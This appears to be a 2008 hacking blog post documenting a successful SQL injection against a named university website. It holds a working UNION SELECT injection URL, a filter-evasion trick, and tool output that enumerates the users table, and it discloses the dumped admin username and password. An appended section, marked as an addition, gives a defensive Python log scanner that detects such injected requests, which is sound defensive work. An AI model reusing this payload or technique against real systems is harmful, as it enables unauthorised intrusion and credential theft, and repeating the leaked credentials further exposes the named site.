viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Wednesday, September 24, 2008

[SQLi] http://law.ui.ac.id

6:06 PM Posted by viperfx07
login= username:passwd = admin:admiN
Problem: where is the admin dir?
Tool: blindext.py (schemafuzz.py can't do it because of the restriction below)

[+] URL: http://www.law.ui.ac.id/berita.php?bid=380
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 15:08:22
[0]: 4.1.11-Debian_4sarge8-log:wwwlaw:wwwlaw

Database information = http://www.law.ui.ac.id/berita.php?bid=-380+union+select+1,2,UNHEX(HEX(concat_ws(char(58),database(),version(),user()))),4,5,6--

I use UNHEX & HEX because there is a conversion error if you don't use this "trick". The error message: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'



Dump:


[+] URL:http://www.law.ui.ac.id/berita.php?bid=380
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!

[14:30:33] StartTime
[+] Fuzzing Tables...

[Table]:users
[Column]:user_name
[Column]:user_password
[Column]:user_login
[Column]:user_id

[14:31:48] EndTime
[-] Total URL Requests 226
[-] Done


[+] URL:http://www.law.ui.ac.id/berita.php?bid=380
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!
[+] Dumping data from database "WWWLAW" Table "users"
[+] Column(s) ['user_login', 'user_password']
[+] 14:57:25
[+] Number of Rows: 4

[0]: admin:admiN
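
The injected request shown above stands out in web server logs, because bid is an integer article id and the injected value is not. The following is an added example, not part of the original post or of the tools it uses: a small Python scanner run over constructed access-log lines. The log format, the client addresses and the NUMERIC_PARAMS set are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Assumption: bid is an integer article id, as in berita.php?bid=380.
NUMERIC_PARAMS = {"bid"}
# SQL syntax seen in the request above; it enriches a finding, it does not trigger one.
SQL_TOKENS = re.compile(
    r"\bunion\b.{0,40}\bselect\b|\b(?:un)?hex\s*\(|\bconcat(?:_ws)?\s*\("
    r"|\b(?:database|version|user)\s*\(\s*\)|--\s*$", re.I)
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')

# Constructed sample log (common log format); client addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [24/Sep/2008:14:30:33 +0700] "GET /berita.php?bid=380 HTTP/1.1" 200 5120
203.0.113.9 - - [24/Sep/2008:14:30:34 +0700] "GET /berita.php?bid=-380+union+select+1,2,UNHEX(HEX(concat_ws(char(58),database(),version(),user()))),4,5,6-- HTTP/1.1" 200 4981
198.51.100.7 - - [24/Sep/2008:14:30:40 +0700] "GET /index.php?q=student+union+select+committee HTTP/1.1" 200 900
"""

def classify(line):
    """Return (client, reasons) for one log line; reasons is empty when the line is clean."""
    m = LOG_LINE.match(line)
    if not m:
        return None, []
    client, target = m.groups()
    reasons = []
    # parse_qsl decodes '+' and %xx, so encoded payloads are checked in decoded form.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
            reasons.append(f"{name}: non-integer value")
            if SQL_TOKENS.search(value):
                reasons.append(f"{name}: SQL syntax in value")
    return client, reasons

def scan(log_text):
    """Count flagged requests per client; a burst from one address suggests automated fuzzing."""
    hits = Counter()
    for line in log_text.splitlines():
        client, reasons = classify(line)
        if reasons:
            hits[client] += 1
    return hits

if __name__ == "__main__":
    for client, count in scan(SAMPLE_LOG).items():
        print(client, count)
```

Keying on the parameter's type rather than on keywords is why the free-text search line in the sample is not flagged.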
